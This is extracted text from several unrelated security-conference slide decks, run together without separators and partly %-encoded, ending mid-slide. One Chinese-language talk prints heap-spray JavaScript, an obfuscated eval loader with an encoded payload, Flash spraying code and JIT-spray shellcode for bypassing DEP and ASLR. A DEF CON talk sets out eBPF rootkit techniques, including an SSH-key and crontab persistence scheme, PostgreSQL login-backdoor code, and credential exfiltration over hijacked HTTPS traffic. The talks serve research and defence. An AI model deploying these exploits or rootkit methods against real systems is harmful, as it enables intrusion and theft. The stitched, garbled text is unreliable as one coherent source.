To%confirm,%we%find%our%tag%in%memory,%followed%by%our%nops%and%shellcode.% Egg%hunters% We%con:nue%execu:on,%find%our%nops%and%shellcode%executes%correctly.% Egg%hunters% Bind%shell%wai:ng%on%port%443%for%us%to%connect%to.% Egg%hunters% Connec:ng%to%our%bind%shell!% @telspacesystems% www.telspace.co.za% References%and%thanks%to:% FuzzySecurity% Corelan%(Peter!)% Offsec% Mae%Miller%(skape)% DEF%CON%(Jeff,%Nikita,%Highwiz,%Toeenkoph%and%all%crew)% The%Telspace%Systems%Crew%(heps://www.telspace.co.za)% %
CONFESSIONS OF A NESPRESSO MONEY MULE NINA KOLLARS @NIANASAVAGE “KITTY HEGEMON” VIEW EXPRESSED TODAY DO NOT NECESSARILY REFLECT THE DON, DOD, NWC, …. YES, THEY KNOW I’M HERE, …. ….SO I BOUGHT SOME COFFEE ON EBAY… And this showed up with my coffee….. Retail $280 Triangulation Fraud …..SO I BOUGHT SOME MORE COFFEE ON EBAY… ….AND THEN I BOUGHT MORE COFFEE ON EBAY VERY POLITE CANCELLED ORDER ‘MAYBE YOU OUGHT TO CONTACT THE FBI….?’ Total bounty: Total Spent: Guilt Factor Less? TOTAL BOUNTY…. 5 Total Purchases 1 Cancelled #of Pods 1200 1 Frother, 1 Espresso Machine $ Spent: 391.90 $ Value : Approx 939 ~ Not on sale…. FOR SALE: GENTLY USED NESPRESSO PIXIE NO….I REALLY HAVEN’T THOUGHT THIS THROUGH…. PROCEEDS TO DIANAINITIATIVE Bidding starts at $1.00 …..Cash only @NIANASAVAGE Come to Tamper Evident AUCTION ENDS SUNDAY @10AM THANK YOU! Nina.kollars@usnwc.edu Shout out to: Mom Dad Brother… HuggyBear Funsized DataGram
Nanika naninb@gmail.com 魔術 薩斯頓三原則  表演之前絕對不透漏接下來的表演內容。  不在同一時間、地點對相同的觀眾變同樣 的表演2次以上。  表演過後,絕不向觀眾透露表演的秘密。 Windows 防護弱點機制 /GS SafeSEH DEP ASLR 突破 破解魔術手法 一般弱點利用 Fish 應用範圍 成功魔術的需求 手法 (弱點利用) Why Spraying  Not control precisely  Not control  Universal 12 NOP  NOP 0x0c0c0c0c OR AL,0C 0x0d0d0d0d 0d OR EAX,0D0D0D0D 0x0a0a0a0a OR CL,BYTE PTR DS:[EDX] 0x0b0b0b0b OR ECX,DWORD PTR DS:[EBX] 0x0c0b0c0b OR AL,0B 0x14141414 ADC AL,14 …………………………………. 13 Not control precisely  esi=0x41414141  mov eax,esi  mov ecx,[eax]  call [ecx+0x8]  Offset 0x10 MEM 0x01140000 AAAAAAAAAAAAAAAA  Offset 0x20 MEM 0x01140010 BBBBBBBBBBBBBBBBB 14 0a 0b 0c 0d Not control  esi=0x0c374512 not control  mov eax,esi  mov ecx,[eax]//no access  call [ecx+0x8] 15 0x0c374512 0b 0c 0d 0b Universal 16 • 2000 • Stack overflow • 0x0013ffa0 • 0x0013ffbc//cookie • 0x0013ffc0//ret • 0x0013ffe0 • 0x0013fff0//seh • 0x0014000//no access • XP • Stack overflow • 0x0013ffac//cookie • 0x0013ffb0//ret • 0x0013ffc0 • 0x0013ffe0//seh • 0x0013fff0 • 0x0014000//no access Classic javascript heap spraying var heapSprayToAddress = 0x12202020;//var payLoadCode = unescape("%uE8FC%u0044……..”); var heapBlockSize = 0x100000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u0c0c%u0c0c"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x10C000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) {memory[i] = spraySlide + payLoadCode;} function getSpraySlide(spraySlide, spraySlideSize) {while (spraySlide.length*2<spraySlideSize) {spraySlide += spraySlide;} spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } 17 JavaScript Encode  <html><body><button id="helloworld" onclick="blkjbdkjb();" STYLE="DISPLAY:NONE"></button></script><script language="JavaScript">var strtmp = String.fromCharCode(102,117,110,99,116,105,111,110,32,101,1 01,106,101,101,102,101,40,41,123,118,97,114,32,115,61,117,1 10,101,115,99,97,112,101,40,34,37,117,48,101,101,98,37,117, 52,98,53,98,37,117,99,57,51,51,37,117,102,54,98,49,37,117,51 ,52,56,48,37,117,101,101,48,98,37,117,102,97,101,50,37,117,4 8,53,101,98,37,117,101,100,101,56,37,117,102,102,102,102,37 ,117,48,55,102,102,37,117,101,101,52,97,37,117,101,101,101, 101,37,117,56,97,98,49,37,117,100,101,52,102,37,117,101,101 ,101,101,37,117,54,53,101,101,37,117,101,50,97,101,37,117,5 7,101,54,53,37,117,52,51,102,50,37,117,56,54,54,53,37,117,54 ,53,101,54,37,117,56,52,49,57,37,117,98,55,101,97,37,117,97, 97,48,54,37,117,101,101,101,101,37,117,48,99,101,101,37,117 ,56,54,49,55,37,117,56,48,56,49,37,………………);var ee = eval;ee(strtmp); 18 老梗還拿出來講……… Flash  當防毒軟體針對 JavaScript 做了動態語 意分析之後,使用各種 Encode 技術通常 無法欺騙防毒軟體,最多只能作到欺騙分 析人員增加分析人的作業時間  Flash 使用者非常的普及,任何有安裝瀏覽 器的都有安裝Flash  JavaScript 做得到的 Flash 大部分都做得 到 19 防護目前最頭痛問題  沒有防不了的東西  不知道的東西防不了  似好似壞游走邊緣的 Flash Spraying public function MainTimeline() {addFrameScript(0, frame1);return;}// end function function frame1(){ shellcode = new ByteArray(); shellcode.writeByte(144);…………… b = "\f\f\f\f";a = "\x0d\x0d\x0d\x0d"; while (b.length < 1048576-(shellcode.length+64))//2097152)//1048576) { b = b + a;} byteArr = new ByteArray(); gy = new ByteArray(); gy.writeMultiByte(b, "iso-8859-1"); byteArr.writeMultiByte(gy, "iso-8859-1"); byteArr.writeBytes(shellcode, 0,shellcode.length); gy1 = new ByteArray(); gy1.writeBytes(byteArr, 0,byteArr.length); gy2 = new ByteArray(); gy2.writeBytes(byteArr, 0,byteArr.length); return; 21 Why Not To Do This? var c=0; var gy1:Array = new Array(); while (c < 128)//2097152)//1048576) { gy1[c] = new ByteArray(); gy1[c].writeBytes(byteArr,0,byteArr.length); c=c+1; } 22 Flash Spraying can not bypass DEP 23 JIT(BlackHat DC 2010) var y=(0x11223344^0x44332211^0x44332211…); 0x909090:35 44332211 XOR EAX, 11223344 0x909095:35 44332211 XOR EAX, 11223344 0x90909A:35 44332211 XOR EAX, 11223344 0x909091:44 INC ESP 0x909092:3322 XOR ESP,[EDX] 0x909094:1135 44332211 ADC [11223344],ESI 0x90909A:35 44332211 XOR EAX, 11223344 24 var ret=(0x3C909090^0x3C909090^0x3C909090^0x3C909090^ …); 0x1A1A0100: 359090903C XOR EAX, 3C909090 0x1A1A0105: 359090903C XOR EAX, 3C909090 0x1A1A010A: 359090903C XOR EAX, 3C909090 0x1A1A010F: 359090903C XOR EAX, 3C909090 0x1A1A0101: 90 NOP 0x1A1A0102: 90 NOP 0x1A1A0103: 90 NOP 0x1A1A0104: 3C35 CMP AL, 35 0x1A1A0106: 90 NOP 0x1A1A0107: 90 NOP 0x1A1A0108: 90 NOP 0x1A1A0109: 3C35 CMP, AL 35 25 JIT Shellcode  mov edi, 0x7946c61b mov al,0x1b push al CMP AL,0x35 inc esp inc esp inc esp CMP AL,0x35 inc esp inc esp NOP CMP AL,0x35 mov al,0xc6 push al CMP AL,0x35 inc esp inc esp inc esp CMP AL,0x35 inc esp inc esp NOP CMP AL,0x35 mov al,0x46 push al CMP AL,0x35 27 0347006A D9D0 FNOP 0347006C 54 PUSH ESP 0347006D 3C 35 CMP AL,35 0347006F 58 POP EAX 03470070 90 NOP 03470071 90 NOP 03470072 3C 35 CMP AL,35 03470074 6A F4 PUSH -0C 03470076 59 POP ECX 03470077 3C 35 CMP AL,35 03470079 01C8 ADD EAX,ECX 0347007B 90 NOP 0347007C 3C 35 CMP AL,35 0347007E D930 FSTENV DS:[EAX] 0x1A1A0110: 803F6E CMP [EDI], 'n' 0x1A1A0113: 6A35 PUSH 35 0x1A1A0115: 75EF jnz short 28 Decoder flow 0x1A1A0101: Decoder 0x1A1A0102: Decoder 0x1A1A0103: Decoder 0x1A1A0104: 3C35 CMP AL, 35 0x1A1A0106: Decoder 0x1A1A0107: Decoder 0x1A1A0108: Decoder 0x1A1A0109: 3C35 CMP, AL 35 0x1A1A010A: Magic 0x1A1A010B: Magic 0x1A1A010C: Magic 0x1A1A010D: 3C35 CMP, AL 35 0x1A1A010E: Encode Shellcode 0x1A1A010E: Encode Shellcode 0x1A1A010E: Encode Shellcode 0x1A1A010D: 3C35 CMP, AL 35 29 ALSR(Address space layout randomization) 30 JIT Spraying(1) function pageLoadEx() { var ldr = new Loader(); var url = "jit_s0.swf"; var urlReq = new URLRequest(url); ldr.load(urlReq);childRef = addChild(ldr); } function pageLoad() { for(var z=0;z<2400;z++){pageLoadEx();} } function Loadzz1() { Security.allowDomain("*"); pageLoad(); } 31 WinXP Vista Win7 32 Bypass ASLR 33 JIT Spraying(2) <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#v ersion=6,0,29,0" width="0" height="0" id="MyFlash"> <param name="movie" value="bb.swf"> <param name="quality" value="high"> <param name="fullscreen" value="true"><param name="scale" value="exactfit"> <embed src="bb.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x- shockwave-flash" width="800" height="600"> </embed> </object> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#v ersion=6,0,29,0" width="0" height="0" id="MyFlash"> <param name="movie" value="bb2.swf"> <param name="quality" value="high"> <param name="fullscreen" value="true"><param name="scale" value="exactfit"> <embed src="bb2.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x- shockwave-flash" width="800" height="600"> </embed> </object> 34 WinXP & Vista 35 WinXP 36 Vista 37 PDF & Flash  Acrobat 9.2 default Enable DEP  Acrobat default support Flash  Adobe: Turn off JavaScript in PDF Reader 38 WinXP PDF & One Big Flash 39 WinXP Vista Win7 40 Include Flash 41 創造 (尋找新的魔術 - 0day) 0day  自己找  等別人寄  收到也不知道  什麼是0day 可以吃嗎?  第一等人,是創造機會的人  第二等人,是發現機會的人  第三等人,是等待機會的人  第四等人,是錯失機會的人  您是第幾等的人呢?? 要怎樣尋找 0day  測試  測試  測試  不斷測試  天公疼憨人 http://rootkit.tw/blog/?p=173 0x66->0x40  收集大量範本  需要大量機器資源  範本丟入測試  自由活動  定時觀察報告 有誰在自動測試弱點?  MS O  安全研究員 O  防毒 ?  地下駭客 O  政府 ?  軟體開發廠商 ?  ???? 要怎樣收穫就要怎樣栽 不要守株待兔 安全還是靠自己最好 有興趣加入或贊助自動化測試弱點 計畫 來信寄到 naninb@gmail.com Thank you Q & A
HITCON GIRLS 成果分享 與 BLACK HAT 之旅 HITCON COMMUNITY 2019 SPEAKERS ‣shad0w ‣ 台灣停電科技大學研究生,HITCONGIRLS創始團隊中最晚脫離學生身份的人(・ω・)ノ ‣akee ‣ HITCONGIRLS成員,不是創始團隊也沒有兼職,只是個單純的成員_(:з」∠)_ ‣HazelYen ‣ HITCONGIRLS創始團隊暨總召,比較擅長活在鍵盤後面的生物(゚∀゚)
 OUTLINE ‣HITCONGIRLS介紹 ‣近期成果與專案 ‣BlackHat旅程 ‣DEFCON見聞 OUTLINE ‣HITCONGIRLS介紹 ‣近期成果與專案 ‣BlackHat旅程 ‣DEFCON見聞 HITCON GIRLS 介紹 HITCONGIRLS是以女性為主的資安社群, 我們組織各種不同主題的讀書會,來幫助成 員們透過合作與分享來克服學習上的瓶頸與 互相學習。創造一個鼓勵並激發女性學習資 安的環境,並增加科技產業的包容性。 HITCON GIRLS 理念 ‣希望聚集對資安感興趣、⼀一起成長的女性,推 廣「任何⼈人都可以學習資訊安全」的理理念念 組織架構 ‣籌備團 ‣讀書會 組織架構 ‣籌備團 ‣讀書會 負責活動和場地財務管理理,和實作 群溝通完善原本的規劃,促成順暢 的活動流程,籌備團也是HITCON GIRLS 創立的前⾝身。 (ง๑ •̀_•́)ง 籌備團 ‣每年年都會辦⼀一場⼤大型的活動 ‣資安推廣活動 ‣粉絲團、twitter、官網... 組織架構 ‣籌備團 ‣讀書會 負責活動和場地財務管理理,和實作 群溝通完善原本的規劃,促成順暢 的活動流程,籌備團也是HITCON GIRLS 創立的雛形。 每個週期會有不定數量量的讀書會⼩小 組,平時獨立運作舉辦組內讀書會, 每個⽉月會有全體交流會,讓⼤大家攝取 不同類型的知識。 d(`・∀・)b DFIR 組 數位鑑識與響應分析組,負責 蒐集資料,分析駭客到底在犯 案現場留留下了了什什麼 以 CTF 為⽬目標的組別,包⼭山包 海海什什麼都研究,還會不定期出團 打 CTF! 惡惡意程式分析組 針對 Malware 進⾏行行分析研 究,內容包含靜態與動態分 析、各種⼯工具以及分析思 路路。 不分組 對於各個領域的資安研究都 會進⾏行行涉獵和分享。 CTF 組 WEB PT 組 專⾨門研究網⾴頁滲透測試的⼿手 法,如何攻擊、如何防禦都是 研究⽬目標 讀書會 OUTLINE ‣HITCONGIRLS介紹 ‣近期成果與專案 ‣BlackHat旅程 ‣DEFCON見聞 近期成果與專案 - 之於一個社群 ‣點數制度 ‣總召選舉&行政團隊 ‣教練制度 ‣英文官網 點數規則的由來 ‣「社群」來自於一群擁有共同理念的夥伴,在「對資訊安全有興趣」 的匯合下我們組成HITCONGIRLS。 ‣健康的社群,需要傳承與制度。 ‣讀書會的經營、活動的籌劃以及組織的營運需要夥伴一起分擔,點數 是為了鼓勵「不斷在付出的人」,不論你做的事情是大是小。 點數可以換什麼 不⼀一定有,有就會回饋社群 總召選舉&行政團隊 ‣健康的社群,需要傳承與制度 ‣讓每個人找到自己的舞台,或許有成員非資安 相關,但是她支持社群的理念,她也可以幫忙 總召怎麼選? ‣由非總召的成員成立選舉活動 ‣徵「總召候選人」,發表未來營運方針、目標 ‣所有成員皆可投票 為什什麼社群要搞得這麼複雜? 搞得好像社群感情很不好? 行政團隊 ‣拆分工作的目標是降低每個人的壓力 ‣環環相扣的行政流程代表每個人都很重要 ‣永遠找得到事情做,沒有的話還可以自己新 增⋯⋯XD 所以到底為什麼要弄得這麼複雜? ‣為了讓社群永存 ‣ 避免單一人力過勞 ‣ 傳承後有完整的文件、營運制度可以參考 ‣ 規範代表限制,同時也代表保障 ‣為了讓成員有參與感、發言權 ‣有一天,總召不在了,任何人都可以當上領導者 教練制度 ‣HG有一個特別的存在叫作「教練」 ‣於讀書會有問題時可向他/她提問 教練制度的苦衷T^T ‣這就是最容易被說「女生真好」的制度 ‣其實呢,Mentor作法在資安圈很常見 ‣其實呢,教練沒有義務要幫我們、回應每個問題 ‣其實呢,就跟在研討會抓住Speaker發問一樣 曾經有人問過粉絲團如何自主學習 教練在這 但學習還 是靠⾃自⼰己 ENGLISH WEBSITE ENGLISH WEBSITE ‣自從上了英文官網後,來自國外的訊息、互 動、活動就變多了呢(推薦XD) ‣感謝成員幫忙翻譯! 近期成果與專案 - 活動回顧 ‣不是刻意,但HG活動大概有三種類型 ‣ 大型活動,開放的、很累的 ‣ 分享,把知識轉成語言、投影片或影片的類型 ‣ 邀請型,會請外部的人來分享經驗 活動回顧:大型活動 2014 第四屆讀書會成員招募CTF HITCONCMT2018 我們的初始Workshop HGatHITB活動 2019 2018 活動回顧:分享 讀書會成果發表 資安萌芽推廣 HG帶你直擊Conf 2015 2017 2019 活動回顧:邀請型 2015 2016 2017 BirdsofaFeather 資安女性分享會 ChipchatParty 週年紀念以及PPP分享 2019 OUTLINE ‣HITCONGIRLS介紹 ‣近期成果與專案 ‣BlackHat旅程 ‣DEFCON見聞 BLACK HAT 旅程 - 前言 ‣為何會有這次演講? ‣ 共同演講邀約 ‣ AsukaNakajima|CTFforGIRLS ‣ SuheeKang|PowerofXX ‣ HazelYen|HITCONGIRLS CTF FOR GIRLS POWER OF XX BLACK HAT 旅程 - 關於投稿的大小事 ‣講師費US$1000 ‣補助機票US$1300 ‣補助住宿(大約2~3萬元左右) ‣可以提前買DEFCON門票 BLACK HAT 旅程 - 前言 ‣為何會有這趟旅程 ‣ 天價的門票(´°̥̥ω°̥̥`)༎y‿༎y(ꈨy˙̫̮ꈨy)(༎y෴༎y)(´;︵;`) ‣ BusinessPass$695 ‣ BusinessHall,Arsenal,SponsoredSessions,Sponsored Workshops,andtheKaliLinuxDojo. BLACK HAT 旅程 - 學生免費專案 ‣BlackHatStudentScholarshipProgram ‣ 為什麼你想參加BH ‣ 有什麼樣的具體經驗讓你有資格拿Pass ‣ 三個過去的BH分享中特別感興趣的內容 ‣Briefingsonly ‣BlackHatEurope學生專案申請:Sep.8~Nov.8 WHAT IS BLACK HAT? ‣1997年開始舉辦,是世界上最具代表性的資訊安全研討會之一 ‣偏向企業、產業 ‣有專業的Trainings,Workshops,但價格比Briefings門票更貴 BLACK HAT 旅程 ‣炫富的開場 ‣完整版可以鎖定BlackHatYoutube頻道,雖然 他們可能還要再過幾個月才會上傳>w< BLACK HAT 旅程 ‣官方APP特點 ‣ 排自己的議程schedule ‣ 每個議程都可以做筆記 ‣ 地圖(會場超級大) BLACK HAT 旅程 ‣Party&NetworkingEvents ‣ 由不同的贊助商和社群舉辦 ‣ 需要事先報名 BLACK HAT 旅程 ‣CareerArea面試區 ‣ 練習英文溝通的好機會 ‣ 雖然可能90%會因為沒有綠卡而失敗 BLACK HAT 旅程 ‣非常禮遇講者 ‣ 住宿、機票、講師費 ‣ 演講前調整mic、演講途中全程幫你控制音量 ‣ 提供rehearsalroom,且有會後討論室讓講者跟會眾可以盡 情討論 ‣ 休息室飲料吧台 BLACK HAT 旅程 - 收獲 ‣最頂尖的技術或漏洞分享 ‣主動找社群/廠商聊天,拓展人脈 ‣所有議程都會錄影並放到Youtube ‣有錢就好了 OUTLINE ‣HITCONGIRLS介紹 ‣近期成果與專案 ‣BlackHat旅程 ‣DEFCON見聞 WHAT IS DEF CON? ‣1993年開始舉辦,是世界上最具代表性的資訊安全研討 會之一 ‣駭客的超大型派對 ‣可以自由地與講者及商家交流,或是參與各種競賽和活動 DEF CON 見聞 - BADGE 介紹 ‣均一票價USD300 ‣白色:human ‣藍色:speaker ‣紫色:vendor ‣綠色:press ‣紅色方形:staff ‣紅色圓形:staff組長 DEF CON 見聞 - 特殊 BADGE ‣要在特定場合參加活動並找到NPC才能取得 magictoken DEF CON 見聞 - PRESS TICKET ‣怎麼申請 ‣ 寄信給pressteam ‣ 主辦回覆approve ‣ 現場到PressRoom付 錢領取,也是USD 300 ‣規則 ‣ 允許在會場錄影、拍照和 採訪 ‣ 攝影要經過對方同意,不 得使用隱藏式攝影機 ‣ 不可以拍小孩(潛規則) DEF CON 見聞 - PRESS TICKET ‣可以做 ‣ 允許在會場錄影、拍照和採訪 ‣ 使用媒體室剪輯影片、編輯採訪文稿,提供插座網路& 飲料吧台! ‣ 會在路上各種被攔阻touchbadge 來來 DEFCON 就是要去參參加 village, contest 啊! 聽那些之後會放到 YouTube 的議程要幹嘛 (「`・ω・)「 DEF CON 見聞 - VILLAGE ‣DEFCON的本體 ‣每個village都會有一個空間,讓host自由發 揮議程、workshop、contest ‣forums上總共有33個,活動不限於會議期間 Car Hacking Skytalks Red Team Blue Team Hack the Sea Wireless Packet Hacking Social Engineer Voting Hacking VX Tamper Evident Soldering Skills Recon Lock Bypass Lockpick IoT Ethics Hardware Hacking Crypto and Privacy Data Duplication Cloud Blockchain Biohacking Aviation AppSec AI Drone Warz Ham Radio ICS Monero r00tz Rogues DEFCON Furs ref: https://forum.defcon.org/node/227570 DEF CON 見聞 - CONTEST AREA ‣由各社群主辦 ‣ 寫小故事 ‣ 鬍子 ‣ 騎腳踏車 ‣ 酒醉駭客 ‣ 飲料降溫 DEF CON 見聞 - CONTEST AREA ‣HackFortress ‣ 絕地要塞2+資安比賽 ‣ 6TF2playersand4hackers ‣ 只會玩FPS就靠TF2打比賽吧¯\_( ͡° ͜ʖ ͡°)_/¯ DEF CON 見聞 - DEMO LAB ‣各自報名,每個人可以來發表自己寫的工具 ‣超小型talks(每場可能不到五個人聽) ‣可以很好的跟講者討論細節 DEF CON 見聞 - 貼紙文化 ‣到處、無所不在、哪邊都會被貼貼紙 ‣大家會交流自己有的貼紙,可以跟別人拿or 交換 DEF CON 見聞 ‣只提供水,其他需自理 ‣今年場地分散在三間飯店 ‣可利用空間很大,但走得很累ヘ(。□°)ヘ DEF CON TIPS ‣會前先上Forums看看今年有什麼活動 ‣提早決定想參加的,就可以花更多時間投入 ‣有些CTF,contest需要事先報名否則無法參加 ‣想拷貝資料需要自行準備TB等級的硬碟(今年 6TB) ‣準備好飛美國的機票錢(~‾▿‾)~ Open your mind ʕっ•ᴥ•ʔっ Just hack it! Q/A Welcome ᕙ(@°▽°@)ᕗ FOLLOW HITCON GIRLS ‣官網:girls.hitcon.org ‣社群: ‣信箱:hgservice@hitcon.org ‣ping:HazelYen
eBPF, I thought we were friends ! Guillaume Fournier Sylvain Afchain August 2021 Defcon 2021 2 About us Guillaume Fournier Security Engineer guillaume.fournier@datadoghq.com Sylvain Afchain Staff Engineer sylvain.afchain@datadoghq.com Sylvain Baubeau Staff Engineer & Team lead sylvain.baubeau@datadoghq.com ● Cloud Workload Security Team ● Leverage eBPF to detect attacks at runtime ● Integrated in the Datadog Agent 3 Agenda ● Introduction to eBPF ● Abusing eBPF to build a rootkit ○ Obfuscation ○ Persistent access ○ Command and Control ○ Data exfiltration ○ Network discovery ○ RASP evasion ● Detection and mitigation strategies Defcon 2021 4 Introduction to eBPF Defcon 2021 5 Introduction to eBPF ● Extended Berkeley Packet Filter ● Sandboxed programs in the Linux kernel ● Initially designed for fast packet processing ● Use cases: ○ Kernel performance tracing ○ Network security and observability ○ Runtime security ○ etc What is eBPF ? Falco Tracee Defcon 2021 6 Introduction to eBPF Step 1: Loading eBPF programs Defcon 2021 7 Introduction to eBPF Step 2: Attaching eBPF programs ● Defines how a program should be triggered ● ~ 30 program types (Kernel 5.13+) ● Depends on the program type ○ BPF_PROG_TYPE_KPROBE ○ BPF_PROG_TYPE_TRACEPOINT ○ BPF_PROG_TYPE_SCHED_CLS ○ BPF_PROG_TYPE_XDP ○ etc ● Programs of different types can share the same eBPF maps “perf_event_open” syscall Dedicated Netlink command Defcon 2021 8 Introduction to eBPF eBPF internals: the verifier The eBPF verifier ensures that eBPF programs will finish and won’t crash. ❏ Directed Acyclic Graph ❏ No unchecked dereferences ❏ No unreachable code ❏ Limited stack size (512 bytes) ❏ Program size limit (1 million on 5.2+ kernels) ❏ Bounded loops (5.2+ kernels) ❏ … and cryptic output ... Defcon 2021 9 Introduction to eBPF eBPF internals: eBPF helpers ● Context helpers ○ bpf_get_current_task ○ bpf_get_current_pid_tgid ○ bpf_ktime_get_ns ○ etc ● Map helpers ○ bpf_map_lookup_elem ○ bpf_map_delete_elem ○ etc ● Program type specific helpers ○ bpf_xdp_adjust_tail ○ bpf_csum_diff ○ bpf_l3_csum_replace ○ etc ● Memory related helpers ○ bpf_probe_read ○ bpf_probe_write_user ○ etc … ~160 helpers (kernel 5.13+) Defcon 2021 10 Abusing eBPF to build a rootkit Defcon 2021 11 Abusing eBPF to build a rootkit ● Cannot crash the host ● Minimal performance impact ● Fun technical challenge ● A growing number of vendors use eBPF ● eBPF “safety” should not blind Security Administrators Why ? Falco Tracee Defcon 2021 12 Abusing eBPF to build a rootkit ● Trade off between latest BPF features / availability => Latest Ubuntu LTS, RHEL/CentOS ● KRSI and helpers such bpf_dpath may help Goals Defcon 2021 13 Abusing eBPF to build a rootkit ● Hide the rootkit process ○ eBPF programs are attached to a running process Our userspace rootkit has to stay resident ○ Detection through syscalls that accept pids as arguments : kill, waitpid, pidfd_open, ... ● Hide our BPF components: ○ programs ○ maps Obfuscation Defcon 2021 14 Abusing eBPF to build a rootkit Demo Program obfuscation Defcon 2021 15 Abusing eBPF to build a rootkit ● bpf_probe_write_user ○ Corrupt syscall output ○ Minor and major page faults ● bpf_override_return ○ Block syscall ○ Alter syscall return value ■ But syscall was really executed by the kernel ! Program obfuscation - Techniques Defcon 2021 16 Abusing eBPF to build a rootkit File obfuscation - stat /proc/<rootkit-pid>/cmdline (1) Defcon 2021 17 Abusing eBPF to build a rootkit Program obfuscation - stat /proc/<rootkit-pid>/exe (2) Defcon 2021 18 Abusing eBPF to build a rootkit ● Block signals ○ Hook on the kill syscall entry ○ Override the return value with ESRCH ● Block kernel modules Program obfuscation Defcon 2021 19 Abusing eBPF to build a rootkit Demo BPF program obfuscation Defcon 2021 20 Abusing eBPF to build a rootkit BPF program obfuscation ● bpf syscall ○ Programs: ■ BPF_PROG_GET_NEXT_ID ■ BPF_PROG_GET_FD_BY_ID ○ Maps: ■ BPF_MAP_GET_NEXT_ID ■ BPF_MAP_GET_FD_BY_ID ○ Hook on new prog / map to get the allocated ID ● Hook on read syscall and override the content Defcon 2021 21 Abusing eBPF to build a rootkit BPF program obfuscation ● bpf_probe_write_user ○ message in kernel ring buffer “...is installing a program with bpf_probe_write_user helper that may corrupt user memory!” ○ dmesg ○ journalctl -f ○ syscall syslog Defcon 2021 22 Abusing eBPF to build a rootkit Demo BPF program obfuscation Defcon 2021 23 Abusing eBPF to build a rootkit BPF program obfuscation Defcon 2021 24 Abusing eBPF to build a rootkit Persistent access ● Self copy ○ Generate random name ○ Copy into /etc/rcS.d ○ Hide file ● Override content of sensitive files ○ SSH authorized_keys ○ passwd ○ crontab Defcon 2021 25 Abusing eBPF to build a rootkit Persistent access - ssh/authorized_keys ● Append our ssh keys to authorized_keys files ● Only for sshd ● Available through the command and control... Defcon 2021 26 Abusing eBPF to build a rootkit Demo Persistent access - ssh/authorized_keys Defcon 2021 Defcon 2021 27 Abusing eBPF to build a rootkit Persistent access - uprobe ● eBPF on exported user space functions ● Alter a userspace daemon to introduce a backdoor ● Compared to ptrace ○ Works on all instances of the program ○ Safer ○ Easier to write Defcon 2021 28 Abusing eBPF to build a rootkit Demo Persistent access - postgresql Defcon 2021 29 Abusing eBPF to build a rootkit Persistent access - postgresql int md5_crypt_verify( const char *role, const char *shadow_pass, const char *client_pass, const char *md5_salt, int md5_salt_len, char **logdetail ) ● md5_salt challenge sent when user connects shadow_pass MD5(role + password) stored in database client_pass MD5(shadow_pass + md5_salt) sent by the client ● new_md5_hash = bpf_map_lookup_elem(&postgres_roles, &creds.role); if (new_md5_hash == NULL) return 0; // copy db password onto the user input bpf_probe_write_user(shadow_pass, &new_md5_hash->md5, MD5_LEN); 30 Abusing eBPF to build a rootkit Command and control: introduction ● Requirements ○ Send commands to the rootkit ○ Exfiltrate data ○ Get remote access to infected hosts ● eBPF related challenges ○ Can’t initiate a connection ○ Can’t open a port ● … but we can hijack an existing connection ! Defcon 2021 31 Abusing eBPF to build a rootkit Command and control: introduction ● Setup ○ Simple webapp with AWS Classic Load Balancer ○ TLS resolution at the Load Balancer level ● Goal: Implement C&C by hijacking the network traffic to the webapp Defcon 2021 32 Abusing eBPF to build a rootkit Command and control: choosing a program type BPF_PROG_TYPE_XDP BPF_PROG_TYPE_SCHED_CLS ❏ Deep Packet Inspection ❏ Ingress only ❏ Can be offloaded to the NIC / driver ❏ Can drop, allow, modify and retransmit packets ❏ Usually used for DDOS mitigation ❏ Deep Packet Inspection ❏ Egress and Ingress ❏ Attached to a network interface ❏ Can drop, allow and modify packets ❏ Often used to monitor & secure network access at the container / pod level on k8s Defcon 2021 33 Abusing eBPF to build a rootkit Command and control: choosing a program type BPF_PROG_TYPE_XDP BPF_PROG_TYPE_SCHED_CLS ❏ Deep Packet Inspection ❏ Ingress only ❏ Can be offloaded to the NIC / driver ❏ Can drop, allow, modify and retransmit packets ❏ Usually used for DDOS mitigation ❏ Deep Packet Inspection ❏ Egress and Ingress ❏ Attached to a network interface ❏ Can drop, allow and modify packets ❏ Usually used to monitor & secure network access at the container / pod level on k8s Network packets can be hidden from the Kernel entirely ! Defcon 2021 34 Abusing eBPF to build a rootkit Command and control: choosing a program type BPF_PROG_TYPE_XDP BPF_PROG_TYPE_SCHED_CLS ❏ Deep Packet Inspection ❏ Ingress only ❏ Can be offloaded to the NIC / driver ❏ Can drop, allow, modify and retransmit packets ❏ Usually used for DDOS mitigation ❏ Deep Packet Inspection ❏ Egress and Ingress ❏ Attached to a network interface ❏ Can drop, allow and modify packets ❏ Usually used to monitor & secure network access at the container / pod level on k8s Network packets can be hidden from the Kernel entirely ! Data can be exfiltrated with an eBPF TC classifier ! Defcon 2021 35 Abusing eBPF to build a rootkit Command and control: hijacking HTTP requests Defcon 2021 36 Abusing eBPF to build a rootkit Demo Sending Postgres credentials over C&C Command and control: hijacking HTTP requests Defcon 2021 37 Abusing eBPF to build a rootkit Data exfiltration Defcon 2021 38 Abusing eBPF to build a rootkit Data exfiltration ● Multiple program types can share data through eBPF maps ● Anything accessible to an eBPF program can be exfiltrated: ○ File content ○ Environment variables ○ Database dumps ○ In-memory data ○ etc Defcon 2021 39 Abusing eBPF to build a rootkit Demo Exfiltration over HTTPS Postgres credentials & /etc/passwd Data exfiltration Defcon 2021 40 Abusing eBPF to build a rootkit DNS spoofing The same technique applies to any unencrypted network protocol ... Defcon 2021 41 Abusing eBPF to build a rootkit Network discovery ● Discover machines and services on the network ● 2 methods ● Activated through Command and Control Defcon 2021 Passive network discovery Active network discovery 42 Abusing eBPF to build a rootkit Network discovery: passive method Defcon 2021 ● Listen for egress and ingress traffic ● TC & XDP ● Discover existing network connections ● TCP & UDP traffic (IPv4) ● No traffic is generated ● Doesn’t work for services which the host is not communicating with Passive network discovery 43 Abusing eBPF to build a rootkit Network discovery: active method Defcon 